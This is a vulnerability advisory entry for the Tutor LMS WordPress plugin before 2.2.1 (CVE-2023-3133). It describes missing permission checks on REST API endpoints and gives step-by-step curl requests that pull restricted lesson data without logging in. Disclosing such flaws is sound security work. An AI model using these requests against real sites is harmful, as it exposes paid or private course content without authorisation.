Lucene search
A. S. M. Muhiminul HasanWPEX-ID:3B6969A7-5CBC-4E16-8F27-5DDE481237F5HistoryJun 12, 2023 - 12:00 a.m.
Tutor LMS < 2.2.1 - Unauthenticated Access to Tutor LMS Lesson Resources via REST API
2023-06-1200:00:00
A. S. M. Muhiminul Hasan
96
tutor lms
unauthenticated access
lesson resources
EPSS
0.002
Percentile
64.6%
The plugin does not implement adequate permission checks for REST API endpoints, allowing unauthenticated attackers to access information from Lessons that should not be publicly available.
1. Create a new Course, add a Topic, and add a Lesson to the Topic.
2. In Tutor LMS > Settings > Course, ensure that "Course Visibility" is toggled to "On" (Students must be logged in to view course)
3. Run the following curl command to get the ID of the course:
curl http://SITE_URL/wp-json/tutor/v1/courses
4. Using the Course ID, run the following curl command to get the ID of the Topic:
curl http://SITE_URL/wp-json/tutor/v1/course-topic/<course-id>
5. Using the Topic ID, run the following curl command to get all of the data from the Lesson, without being logged in:
curl http://SITE_URL/wp-json/tutor/v1/lesson/<topic-id>Related
osv
osv
CVE-2023-3133
2023-07-04 08:15:10
cve
cve
CVE-2023-3133
2023-07-04 08:15:10
wpvulndb
wpvulndb
cvelist
cvelist
prion
prion
Design/Logic Flaw
2023-07-04 08:15:00
nvd
nvd
CVE-2023-3133
2023-07-04 08:15:10
wordfence
wordfence